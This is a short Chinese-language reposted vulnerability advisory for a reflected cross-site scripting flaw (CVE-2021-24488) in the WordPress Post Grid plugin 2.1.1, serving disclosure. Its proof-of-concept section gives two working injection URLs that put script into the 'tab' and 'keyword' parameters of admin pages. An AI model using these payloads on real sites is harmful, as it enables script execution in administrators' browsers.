WordPress 插件 Post Grid 2.1.1 跨站脚本 (XSS)
WordPress 插件 Post Grid 2.1.1 跨站脚本 (XSS)
Khan安全团队
发布于 2022-03-03 09:30:23
发布于 2022-03-03 09:30:23
文章被收录于专栏:Khan安全团队
# 软件链接:https://wordpress.org/plugins/post-grid/
# 版本:2.1.1
# 测试:Windows 10
# CVE:CVE-2021-24488
一、说明:
这个插件从任何帖子类型创建一个帖子网格。通过插件设置的滑块导入搜索功能和选项卡参数容易受到反射的跨站点脚本的攻击。
2. 概念证明:
wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script>
wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
腾讯云开发者
